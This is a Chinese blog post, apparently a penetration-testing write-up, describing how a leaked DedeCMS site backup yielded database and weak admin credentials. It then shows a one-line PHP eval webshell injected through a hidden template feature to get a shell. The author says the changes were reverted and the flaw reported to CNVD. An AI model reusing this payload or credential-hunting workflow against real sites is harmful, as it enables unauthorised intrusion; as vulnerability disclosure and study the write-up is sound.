记一次从源码泄露到getshell

最新推荐文章于 2024-07-27 09:56:32 发布
最新推荐文章于 2024-07-27 09:56:32 发布
阅读量2.3k 收藏
点赞数
分类专栏: 众测渗透 文章标签: 渗透测试 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45794666/article/details/122675228
版权

记一次从源码泄露到getshell

前言:

首发于先知社区:记一次从源码泄露到getshell

此次渗透中的所有修改已经复原,且漏洞已经提交至cnvd平台

源码泄露

在一个月黑风高的夜晚,闲来无事的我又开着脚本利用hunter进行互联网站点源码的扫描

在查看备份文件扫描结果时,看到了宝贝

image-20211214193708639

二话不说,访问下载得到源码!

可以在注释信息处发现dedecms的痕迹

image-20211214193751676

敏感信息泄露

获得源码的第一步当然是获取敏感信息

先尝试全局搜索(crtl+shift+f)关键词

key
pwd
passwd
password

1.数据库信息泄露

image-20211214181425720

2.后台管理员密码泄露

image-20211214183126309

md5解密尝试解密,居然是一个弱口令

image-20211214183057010

有了账户密码后当然是要找到后台管理地址,那么有了源码后台管理地址还不是手到擒来?

后台RCE->getshell

源码中找到后台地址(居然改了个888)

image-20211214201708314

用泄露的admin/admin888进入后台后,发现版本信息为dedecms PS1

历史漏洞

查找SP1历史漏洞都是远程代码包含漏洞,但是这个站点已经将关键文件install.php删除(源码中不存在)

抱着侥幸心里又去尝试访问l一下(说不定后来又加上了呢)确实不存在,只能继续查看其他功能点

然后也尝试测试了许多SP2的漏洞payload但均失败

继续测试其他点

继续查看发现系统设置->系统基本参数->其他选项中有模板引擎的禁用函数

image-20211214194020145

但是明明没有模板引擎功能他为什么要禁用呢?

我带着这个疑问又重新翻看源码

果然又找到模板相关文件,(说明只是功能点被隐藏,文件依旧还在)

image-20211214194129962

尝试访问,成功访问到并且能够正常执行

image-20211214194202553

那么就好办了,根据dedecms模板规则,后台模板写入payload,访问即可执行PHP代码

{dede:field name='source' runphp='yes'}@eval($_POST['lyy']);{/dede:field}
//调用方式 [field:字段名/] 这里的关键是runphp='yes'
//php代码则是简单的一句话

然后去将其他选项中的禁用函数全部删除保存

image-20211214192831313

因为注入到了index.htm

所以连接webshell 的 url为首页

http://xxxxx:9890/index.php

image-20211214193411871

成功getshell

image-20211214194742332

本来还应该通过源码泄露得到的数据库账户密码尝试连接数据库的,但这里删shell跑路太急了就忘记了测了

6ri9ht
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
thinkphp5远程执行代码漏洞修复补丁.zip
04-17
应用这个补丁的过程通常包括:下载补丁文件,解压,然后按照提供的指导将补丁应用到ThinkPHP5的源代码中,最后重启服务以使改动生效。 关于ThinkPHP5远程执行代码漏洞,它可能源于框架的某些函数或组件处理用户输入...
putty(含源代码)
09-24
这款工具是绿色软件,无需安装即可使用,且包含了源代码,用户可以根据自己的需求进行定制或二次开发。 PuTTY的主要功能在于提供了一个安全的终端模拟器,支持多种网络协议,包括SSH1、SSH2、Telnet、Rlogin和...
阿里云accesskey利用工具-aliyun-accesskey-Tools
siu~
09-25 302
此工具用于查询ALIYUN_ACCESSKEY的主机,并且远程执行命令。
使用AccessKey作为用户身份标识信息
伊人回眸泪倾城的博客
03-27 5944
AccessKey的生成:GUID生成_accessToken = Guid.NewGuid().ToString(“N”);AccessKey功能1. 用户身份信息标识:保存到Redis数据库中,哈希值,作为哈希值的键名; 需要加上前缀:session:login + AccessKey; 2. 验证码:缓存在Redis数据中的,键名;详细使用流程
【推荐】阿里云主机accesskey利用工具
Websec
12-21 5073
1、简介 在日常渗透过程中我们经常遇到信息泄露出ALIYUN_ACCESSKEYID与ALIYUN_ACCESSKEYSECRET(阿里云APIkey),特别是laravel框架得debug信息。APP中也会泄露这些信息.通过这款利用工具我们可以进行命令执行获取到shell然后进行内网渗透。 具体的github地址如下: https://github.com/mrknow001/aliyun-accesskey-Tools exe文件下载地址: https://github.com/mrknow.
从信息泄露到网站getshell
weixin_43460070的博客
04-12 232
1.本文由来 个人感觉信息泄露漏洞是最容易挖的,写一篇纪实, 一般是谷歌语法利用的比较多 Filetype:xls Xls、 doc 、pdf、 txt 、mdb 、md、 zip、 rar 、7z 、xlsx 、docx 、sql都是常见的类型,大家可以自己去尝试 2.实战纪实 我这里有一个实战纪实 先谷歌语法搜索 一般不需要点进去查看,根据页面大致内容即可查看是否有真正的身份 像对于身份等信息没有很明显打码的我们就可以下载来看 根据页面给出的url去访问他的网站(一般如果有这种泄露,说明网站管理员安全
漏洞挖掘中的常见的源码泄露
weixin_30871905的博客
08-04 521
这几天一直想写点啥,偶然间,逛我们团长 小艾 的博客,我看到一个文章,题目是 " 常见的web 源码泄露漏洞 ",其中录了好多源码泄露,但是我就见过其中三个,所以就想着总结一份挖洞中常见的源码泄露吧。 小艾那篇文章的地址:http://www.htmlsec.com/?p=50 在录之前,我为了证明我的想法,我以关键词 ' 源码泄露 ' 在乌云漏洞库刷了一遍案例。 一共 30...
从对网站进行SQL注入到下载网站整站源码的全过程.zip
12-11
7. **下载网站源码和数据库**:“5打包网站的源码与数据库”描述了攻击者如何将网站的源代码和数据库完整地下载下来。这可能涉及到利用系统的备份功能,或者直接通过SQL语句导出数据库内容。 8. **本地搭建与复现**...
curso-rest-apis-lab2
03-21
在REST API设计中,安全性是非常关键的一环,开发者需要确保API的调用只能由授权的用户进行,防止未授权访问或数据泄露。 “Shell”标签表明这个项目可能涉及到命令行接口(CLI)的使用,例如使用Bash shell或其他...
thinkphp5.1.39、tp5.1.39版本
06-01
通过注解,开发者可以在代码中直接定义路由、控制器行为、模型关系等,使代码更加清晰,降低了配置文件的复杂度。 3. **强大的查询构建器**:ThinkPHP5.1.39的查询构建器提供了丰富的SQL操作方法,支持链式调用,...
警告:攻击者利用 SonarQube 漏洞盗取国内多个机构的大量源码
程序猿DD
11-14 4247
作者 |KubeSphere云原生来源 |https://mp.weixin.qq.com/s/6dg51fKgLjSQTjmyFWl4DA2021 年 10 月 22 日,国外知名媒...
源码泄露到getshell(2)
weixin_45794666的博客
01-24 1910
源码泄露到getshell(2) 前言 文章首发于先知社区:源码泄露到getshell(2) 文章所述漏洞已经提交至漏洞平台,且所有恶意操作均已复原 源码泄露 http://www.xxx.com.cn/www.zip 老规矩拿到源码先通关关键词找敏感信息 key pwd passwd password 找到了半天居然找不到一个有效的密码 最后在robots.txt中看到CMS的信息-EmpireCMS 查询知道是开源cms后,直接百度查询数据表结构 知道了管理员录表为phome_enewsuse
如何获得cnvd原创漏洞证书之信息泄露篇(结尾福利)
weixin_50464560的博客
06-19 5027
一、前言 做任何事情,付出就要有回报,这样才会有动力。而对于挖漏洞这件事情,回报其实就是获得证书和奖金了。今天我就来讲讲如何获得证书。发现很多师傅对cnvd证书的挖掘缺乏思路,明明已经学了很多知识,但却苦无思路。看着一些大佬整天貌似不费吹灰之力便得到很多证书,除了羡慕,还是羡慕。作为一个过来人,我这次就来讲述一下我拿到第一张cnvd原创漏洞证书的过程。首先先声明一下,由于本人技术有限,可能不能很好的诠释,希望各位师傅看了轻喷,谢谢观看。 二、通用型漏洞 首先最开始我是不了解事件型漏洞跟通用型漏洞的区别,所以
【论文速读】| MoRSE:利用检索增强生成技术填补网络安全专业知识的空白
m0_73736695的博客
07-25 518
本文介绍了MoRSE(Mixture of RAGs Security Experts),这是首个专为网络安全设计的AI聊天机器人。MoRSE利用两个并行工作的RAG(检索增强生成)系统,从多维网络安全背景中检索并组织信息。
网络安全相关竞赛比赛
黑战士的博客
07-18 1305
湖南省委网信办联合省教育厅、省广播电视局、省政务管理服务局、省通信管理局、长沙市人民政府等6家单位共同主办。教育部认可的大学生学科竞赛网站链接(2023版)关键字:比赛、CTF、赛事、技能挑战。浙江省大学生网络与信息安全竞赛。全国网络安全行业职业技能大赛。湖南省“网安湘军杯”
OWASP ZAP:一款功能强大的开源Web安全扫描工具
Coder加油站的专栏
07-27 848
OWASP ZAP是一个功能强大的Web应用程序安全扫描工具,适用于各种开发、测试和生产环境。通过自动扫描、手动测试、被动扫描和主动扫描等多种功能,ZAP能够帮助用户全面评估Web应用程序的安全性。此外,ZAP还提供了强大的API、插件和扩展功能,可以与CI/CD流水线集成,自动化地进行安全测试
mpu6050陀螺仪使用方法开发教程文档.docx
最新发布
07-30
mpu6050陀螺仪使用方法
【SCI顶级】龙格库塔算法RUN-CNN-LSTM-Multihead-Attention温度预测【含源码 5747期】.zip
07-30
CSDN海神之光上传的全部代码均可运行,亲测可用,直接替换数据即可,适合小白; 1、代码压缩包内容 主函数:Main .m; 数据; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,可私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开除Main.m的其他m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描博主博客文章底部QQ名片; 4.1 CSDN博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作 智能优化算法-CNN-LSTM-Mutilhead-Attention回归预测系列程序定制或科研合作方向: 4.4.1 遗传算法GA/蚁群算法ACO-CNN-LSTM-Mutilhead-Attention回归预测 4.4.2 粒子群算法PSO/蛙跳算法SFLA-CNN-LSTM-Mutilhead-Attention回归预测 4.4.3 灰狼算法GWO/狼群算法WPA-CNN-LSTM-Mutilhead-Attention回归预测 4.4.4 鲸鱼算法WOA/麻雀算法SSA-CNN-LSTM-Mutilhead-Attention回归预测 4.4.5 萤火虫算法FA/差分算法DE-CNN-LSTM-Mutilhead-Attention回归预测
大模型的数学之魂:统计学习理论精要
07-30
大型机器学习模型,通常简称为“大模型”,是指具有数十亿甚至数千亿参数的深度神经网络模型。这些模型因为其庞大的参数量和复杂的计算结构,能够处理非常复杂的任务和数据,展现出强大的表达能力和预测性能。大模型在自然语言处理、计算机视觉、语音识别和推荐系统等多个领域都有广泛的应用。 大模型的设计目的是通过训练海量数据来学习复杂的模式和特征,从而具备强大的泛化能力,能够对未见过的数据做出准确的预测。与参数较少、层数较浅的小模型相比,大模型虽然需要更多的计算资源和时间来训练和推理,但它们展现出了一种被称为“涌现能力”的特性,即从原始训练数据中自动学习并发现新的、更高层次的特征和模式。 大模型的发展历程可以分为几个阶段,从早期的卷积神经网络模型发展到以Transformer为代表的全新神经网络模型,再到当前以GPT为代表的预训练大模型阶段。Transformer架构因其自注意力机制而成为大模型的核心技术,它使得模型能够更好地理解和处理文本数据中的长距离依赖关系。 大模型的分类主要包括语言大模型(NLP)、视觉大模型(CV)和多模态大模型。语言大模型专注于处理文本数据和理解自然语言,而视觉大模型用
深入理解Linux内核源代码:从入门到精通
《Linux内核源代码情景分析》是一本深入浅出的教程,旨在帮助读者掌握Linux内核的精髓,从而在Linux开发领域达到更高的水平。无论是对于系统编程、设备驱动开发还是嵌入式系统设计,这本书都提供了宝贵的指导和洞察...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值